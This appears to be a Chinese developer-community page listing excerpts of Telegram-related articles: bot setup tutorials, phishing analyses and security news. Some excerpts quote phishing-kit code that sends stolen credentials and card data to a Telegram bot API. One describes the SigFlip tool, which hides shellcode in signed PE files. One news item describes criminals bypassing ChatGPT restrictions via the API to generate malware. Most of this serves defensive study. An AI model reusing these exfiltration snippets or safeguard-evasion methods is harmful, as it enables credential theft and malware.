首页
学习
活动
专区
圈层
工具
发布

如何使用SigFlip篡改身份认证码签名的PE文件

关于SigFlip SigFlip是一款能够篡改经过身份认证码签名的PE文件(exe、dll、sys等)的工具,而且整个过程不会影响或破坏已有的身份认证码签名。...换句话来说,就是我们可以使用SigFlip向PE文件中嵌入数据(比如Shellcode),并且再不会破坏文件签名、完整性检查或PE文件功能的情况下,修改PE文件的校验和或哈希。...SigInject将保存针对PE文件的修改操作,并保证其签名和证书有效性不变。...SigLoader是一个基础加载器,它采用SigInject创建的修改后的PE文件路径和解密密钥作为参数,然后提取和解密嵌入的Shellcode,以供选择Shellcode注入使用。...)>" SigInject:向PE文件的[WIN_CERTIFICATE]证书表中注入加密的Shellcode,打印的加密密钥可以跟基础C/C#加载器结合使用以保证签名和证书的完整性: SigInject

1.4K40

一个基于Go的Telegram RSS Bot机器人,支持应用内阅读预览

说明:很久前博主介绍过一个Telegram RSS机器人→传送门,用起来还不错,就是安装对新手不太友好,这里就再介绍一个基于Go的Telegram RSS Bot,安装很快,也支持直接在Telegram...应用内预览订阅文章,很方便,也是博主用过最好用的一个Telegram RSS机器人,这里就说下使用方法。...2、申请Telegraph Token curl https://api.telegra.ph/createAccount?...100 #自定义telegram bot api url,选填 telegram: endpoint: https://xxx.com/ #使用Mysql数据库,不填则默认使用SQLite mysql.../data.db ##这里博主默认使用的SQLite,扫描间隔为5分钟,所以使用到的参数如下: bot_token: XXX telegraph_token: xxxx update_interval

2.1K00
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

    本文聚焦于2025年曝光的一类以Telegram为核心载体的高级钓鱼活动,系统剖析其如何利用Bot API、公开频道、WebView嵌入及消息自毁等原生功能,实现凭据窃取、会话劫持与恶意分发的闭环。...本文提出一套涵盖终端行为监控、身份认证加固、浏览器运行时保护与威胁情报提取的多维防御框架,并辅以可落地的代码示例,验证对异常Telegram进程通信、WebView劫持及Bot API调用的识别能力。...此类攻击的核心挑战在于其“合法性掩护”:所有通信均经由telegram.org域名完成,符合SPF/DKIM/DMARC标准;Bot API调用使用HTTPS加密;消息支持自毁与私聊加密,极大增加取证难度...更重要的是,传统安全设备难以区分正常用户使用Telegram与恶意Bot数据回传之间的流量差异。...6 结语本文系统分析了Telegram基础设施在现代钓鱼攻击中的滥用模式,阐明其如何通过Bot API、频道分发与WebView嵌入实现端到端攻击闭环。

    23510

    Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

    关键词:Telegram机器人;凭证钓鱼;Bot API;会话接管;多因素认证;行为检测1 引言随着云服务与数字身份的深度融合,凭证窃取已成为网络攻击的核心目标。...然而,自2024年起,欧洲地区出现一种以Telegram机器人为交互枢纽的新型钓鱼模式,显著提升了攻击效率与隐蔽性。...本文聚焦该攻击范式,旨在回答三个问题:(1)Telegram机器人如何嵌入钓鱼攻击链并提升其交互性?(2)其技术实现是否存在可检测的行为特征?(3)组织应如何调整现有安全策略以阻断此类人机协同攻击?...整个过程在5分钟内完成,且因使用真实品牌界面与即时交互,成功率显著高于传统钓鱼。4 技术检测与防御方案4.1 封禁Telegram关联基础设施安全网关应识别并阻断与已知恶意Bot关联的通信。...4.2 多因素认证加固鉴于攻击者可绕过短信/推送式MFA,建议强制使用FIDO2硬件安全密钥或基于证书的认证。

    17610

    部署你的RSS机器人

    telegram bot api url)(可忽略) allowed_users(允许使用 bot 的用户 telegram id)(可忽略(为空时所有用户都能使用 bot)) 申请 Telegram...格式的文本,其中的 access_token 字段值即为 Telegraph Token,请妥善保存 curl https://api.telegra.ph/createAccount?...author_url 请替换成自己的 查看 Telegram ID | 默认的配置是允许所有用户使用我们刚刚创建的 Telegram RSS Bot,但为了安全、防止被滥用我们可以设置指定 ID 的...Telegram 用户能够使用该 Bot,获取允许使用用户(比如自己)的 Telegram ID 并填入配置文件的 allowed_users 字段 获取 Telegram ID:https://t.me...start=botostore 使用 将 Bot 添加到您的频道中,并设置为管理员,Bot 的管理命令如下: /sub @ChannelID [url] 订阅 /unsub @ChannelID [url

    1.3K20

    使用n8n搭建服务器监控系统:从Webhook到Telegram告警的完整实现

    本文介绍如何使用n8n工作流自动化工具搭建一个完整的服务器监控系统,实现从数据采集、告警判断到Telegram消息推送的全流程自动化,整个方案无需编写复杂代码,配置完成后可实现7x24小时实时监控。...Bot(用于接收告警消息)支持HTTPS的域名(用于Webhook接收)配置信息获取:n8n域名:替换your-n8n-domain.com为你的n8n实际部署域名认证Token:使用openssl...rand -hex 32命令生成强随机字符串Telegram Chat ID:与Bot对话后访问 https://api.telegram.org/botBOT_TOKEN>/getUpdates...发送告警到Telegram当检测到告警时,通过Telegram Bot发送通知消息:执行以下命令进行安装/配置:从配置可以看到,Telegram节点的关键设置:Resource: MessageOperation...测试验证配置完成后,使用curl命令测试整个流程:执行以下命令进行安装/配置:测试命令示例:curl -X POST https://your-n8n-domain.com/webhook/server-monitor

    2K100

    钓鱼团伙用Telegram机器人“接单”:欧洲凭证窃取进入“实时客服”时代

    据网络安全媒体《Security Chronicle World》(SC World)2025年12月发布的简报,一种以 Telegram Bot 为指挥中枢 的新型钓鱼模式正在欧洲快速蔓延。..."时间: " . date('Y-m-d H:i:s');// 调用Telegram API发送消息file_get_contents("https://api.telegram.org/bot{$bot_token...开放API成双刃剑Telegram之所以成为钓鱼团伙的首选平台,源于其三大特性:Bot API完全开放且文档完善:开发者可轻松创建具备消息推送、按钮交互、文件传输能力的机器人;端到端加密非默认启用:普通群组和频道通信未加密...事后分析发现,攻击者使用的Telegram机器人名为 @CloudGrabber_Bot,其频道中同时监控着来自12个国家的 87个活跃钓鱼站点,平均每15分钟就有一次新凭证捕获。...网络层:封禁高风险Telegram基础设施在防火墙或代理中,基于威胁情报封禁已知与钓鱼相关的Telegram Bot Token、Channel ID对应的IP段;使用DNS过滤服务(如Cisco Umbrella

    7610

    Telegram小程序钓鱼攻击机制与防御策略研究

    关键词:Telegram;Mini Apps;网络钓鱼;数字资产;钱包劫持;安全防护(1) 引言Telegram自2013年上线以来,凭借端到端加密(Secret Chat)、跨平台同步及开放API等特性...Mini App的启动流程如下:用户点击消息中的“Launch”按钮或Bot菜单项;Telegram客户端加载开发者预设的HTTPS URL;页面通过window.Telegram.WebApp对象与宿主环境通信...然而,这些限制存在明显漏洞:首先,initData虽经Telegram签名,但仅用于身份声明,不包含强认证凭证。...关键伪造点包括:使用与官方Bot相似的用户名(如@portal_market vs @portals);在Mini App信息页中填写虚假的“官方频道”链接;模拟Telegram原生加载动画,增强可信度...(5.3) 平台治理建议Telegram应改进Mini Apps审核机制:实施域名备案制:要求开发者使用已验证的企业域名;引入应用签名:对Mini App前端资源进行哈希校验,防止运行时篡改;建立快速举报通道

    17710

    钓鱼攻击之后,你的密码去了哪里?——一场横跨暗网、Telegram与企业内网的数据黑市追踪

    取而代之的,是基于即时通讯工具的实时数据回传机制。其中,Telegram因其开放的Bot API、端到端加密(可选)、以及极低的运营门槛,成为当前最主流的“数据接收器”。...研究人员在2025年12月捕获的一个仿冒招商银行的钓鱼页面中,发现了如下代码片段:// 钓鱼表单提交后执行fetch('https://api.telegram.org/bot/sendMessage...和——它们指向攻击者预先创建的Telegram Bot。...更危险的是,部分攻击者会利用被盗SaaS账户(如Office 365、Google Workspace)申请新的API令牌,绕过多因素认证(MFA),实现持久化访问。...对个人用户,专家建议:绝不复用密码:使用密码管理器生成并存储唯一强密码;强制启用MFA:优先选择FIDO2安全密钥(如YubiKey)或认证器App,避免短信验证码;定期检查泄露记录:通过Have I

    12010

    面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

    正因如此,Aruba成为钓鱼攻击的优先目标。2.3 现有防御机制的不足传统邮件网关(SEG)依赖签名匹配与URL黑名单,难以应对动态生成的钓鱼页面。...更关键的是,Telegram Bot作为数据回传通道,具有高隐蔽性与实时性:// telegram.phpfunction send_to_telegram($user, $pass, $ip) {$bot_token...\nUser: $user\nPass: $pass\nIP: $ip";$url = "https://api.telegram.org/bot$bot_token/sendMessage?...API调用if re.search(r'api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/sendMessage', packet.payload):if not whitelist.contains...企业亦应实施最小权限原则,限制Aruba账户的API访问范围。六、结语本文通过对一款针对意大利Aruba用户的钓鱼工具包进行逆向分析,揭示了其前端仿冒、地理过滤、Telegram外传等关键技术特征。

    15110

    黑客靠ChatGPT赚钱:每100次收费37元,还能修改恶意软件代码

    “机器人即服务” 据相关安全公司消息,黑客们首先找到一种可以绕过OpenAI限制的方法,通过使用ChatGPT API集成到他们的一个应用程序中。...事实上证明,相较于网页端,API版本反而不会对恶意内容进行强制限制。 其中有个论坛的用户,就将其与Telegram消息APP结合起来,以此来出售服务Telegram bot。...△Telegram bot生成的钓鱼软件,图源:Enlarge △Telegram bot生成的恶意软件,图源:Enlarge(下同) 与此同时,其他黑客也在发布一些可以免费生成恶意内容的代码。...一种是Web用户界面,一种是API,将OpenAI的模型和数据跟你自己的应用界面配套使用。 比如这些都是合法认证的APP。 此前,黑客们使用Web端ChatGPT生成恶意软件和钓鱼邮件很容易。...但随着ChatGPT的监管不断加强。OpenAI的CTO也在最近的采访中提及了监管的重要性。 黑客们逐渐开始转战去使用他们的API,结果限制要少得多。

    86420

    Telegram Bot – 在线获取群聊GroupChat ID 教程

    假设机器人名称是my_bot。 1-将机器人添加到组中。 转到组,单击组名称,单击添加成员,在搜索框中搜索您的机器人,如下所示:@my_bot,选择您的机器人并单击添加。 2-向机器人发送虚拟消息。...您可以使用此示例:/my_id @my_bot 我尝试了一些消息,但并非所有消息都有效。上面的示例工作正常。...也许消息应该以 / 开头) 3- 转到以下网址: https://api.telegram.org/botXXX:YYYY/getUpdates 将 XXX:YYYY 替换为您的机器人令牌,如: https...://api.telegram.org/bot123456789:jbd78sadvbdy63d37gda37bd8/getUpdates 4- 查找 "chat":{"id":-zzzzzzzzzz,...5-测试:您可以测试使用 curl 向群组发送消息: curl -X POST "https://api.telegram.org/botXXX:YYYY/sendMessage" -d "chat_id

    36.2K30

    跨国钓鱼攻击的技术特征与执法协作机制研究——以罗马尼亚破获HMRC诈骗案为例

    后端采用轻量级PHP脚本接收表单提交,并将窃取的数据通过Base64编码后POST至隐藏的Telegram Bot或通过Tor网络转发至C2服务器。关键后端处理逻辑如下(简化版):api.telegram.org/bot{$...bot_token}/sendMessage";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POST...HMRC通过其内部威胁情报平台识别出异常登录模式(如同一IP短时间内尝试多个NIN验证),并将可疑域名、IP地址及Telegram Bot ID提交至Europol的EC3(欧洲网络犯罪中心)。...(一)邮件层:增强认证与内容分析建议所有政府机构强制实施DMARC策略(p=reject),并部署基于机器学习的邮件内容分析模型。

    25510

    面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

    文中提供可部署的自动化检测脚本示例,包括相似域名生成与监控、邮件URL跳转链解析、Telegram Bot通信特征提取等关键技术实现。...关键词:定向钓鱼;网络托管;社会工程;品牌仿冒;多因素认证;域名安全;Telegram Bot;SSL证书滥用1 引言网络托管服务作为现代数字基础设施的核心组成部分,承载着数百万中小企业、政府机构及个人网站的运行...传统基于签名或黑名单的反钓鱼机制难以应对动态生成的仿冒站点。因此,亟需从攻击链视角出发,解构其运作逻辑,并提出可落地的防御对策。...3.3 数据外泄路径典型数据流如下:Victim → Fake Login Page → PHP Collector Script → Telegram Bot (via API) → Attacker...(creds):url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"payload = {"chat_id": CHAT_ID,"text

    18410

    钓鱼攻击中窃取数据的流转路径与防御机制研究

    关键词:钓鱼攻击;凭证泄露;数据流转;暗网市场;多因素认证;异常登录检测1 引言钓鱼攻击自21世纪初成为主流社会工程手段以来,其技术形态与商业模式持续演化。...因此,本文旨在回答以下核心问题:(1)钓鱼窃取的数据如何被传输、存储与分类?(2)地下市场如何对不同类型凭证进行估值与交易?(3)攻击者如何利用这些数据实施二次乃至多次攻击?...因此,2020年后,此类方式使用率显著下降。2.2 Telegram Bot 成为主流回传通道当前绝大多数钓鱼页面嵌入Telegram Bot API实现即时数据推送。...攻击者首先在Telegram上创建Bot并获取token,随后在钓鱼脚本中调用Telegram的sendMessage接口。...对于电商账户,可能直接下单高价值商品;对于云存储,则下载敏感文件用于勒索。

    14010

    基于“Smishing Triad”事件的短信钓鱼攻击机制与防御体系研究

    研究指出,传统基于签名或黑名单的防御手段在面对高频轮换域名、合法SSL证书滥用及多跳跳转链时存在显著盲区。...为此,本文提出融合品牌保护、通信内容策略、终端行为分析与自动化威胁情报响应的纵深防御框架,并提供可部署的代码示例,包括相似域名生成监控、短信关键词正则匹配、Telegram Bot通信特征提取及移动钱包异常绑定检测逻辑...关键词:短信钓鱼;Smishing Triad;Lighthouse;钓鱼即服务;移动支付;Telegram Bot;品牌仿冒;SSL证书滥用1 引言随着移动支付在全球范围内的普及,攻击者正将焦点从传统网络钓鱼...(2)Lighthouse平台在技术上如何规避检测并提升欺骗性?(3)现有安全机制为何难以应对高频轮换的钓鱼基础设施?(4)应如何构建兼顾实时性与准确性的防御体系?...os.getenv('TG_CHAT_ID')def exfiltrate_card_data(card_info):url = f"https://api.telegram.org/bot{BOT_TOKEN

    18910

    RasaGpt——一款基于Rasa和LLM的聊天机器人平台

    很多实现细节都已经处理好了,你不需要自己动手,包括: •使用FastAPI创建你自己的专有bot端点,包括文档上传和“训练”流程。•如何将Langchain/LlamaIndex和Rasa集成。...密钥[20]•Telegram bot 凭据[21]•Ngrok 认证令牌[22]•Make (Mac OS[23]/ Windows[24])•SQLModel 设置 git clone https:...5.使用Rasa设置ngrok,以便Telegram具有回复您的API服务器的Webhook6.设置Rasa actions服务器,以便Rasa可以与RasaGPT API进行通信7.使用seed.py...Telegram 1.Rasa会自动使用你在 credentials.yml[27] 文件中设置的回调webhook,自动更新Telegram Bot API。2.默认情况下,这是静态的。...只需执行以下操作: curl -sS "https://api.telegram.org/botbot-secret-token>/getWebhookInfo" | json_pp 上述命令应返回此内容

    5.8K20

    低门槛钓鱼工具包的工业化趋势与防御对策研究

    然而,自2023年起,攻击生态出现显著变化:高度集成的“现货”钓鱼工具包(off-the-shelf phishing kits)开始在Telegram频道、俄语论坛及加密市场以月度订阅形式出售,价格从...2.5 凭据回传与二次利用捕获的凭据通过Telegram Bot或Discord Webhook实时推送:import requestsdef log_to_telegram(creds):bot_token...= "YOUR_BOT_TOKEN"chat_id = "YOUR_CHAT_ID"msg = f"New credential: {creds}"url = f"https://api.telegram.org...样本中提取IoC:页面HTML的SHA256哈希使用的JS库版本(如jQuery 3.6.0 + custom obfuscator)C2回调的Telegram Bot Token片段短生命周期域名的注册模式...本文通过解构PhaaS技术栈,揭示其如何压缩攻击窗口、扩大受害面,并在此基础上提出以无密码认证为基础、行为分析为补充、身份体系强化为支撑的综合防御框架。

    22410
    领券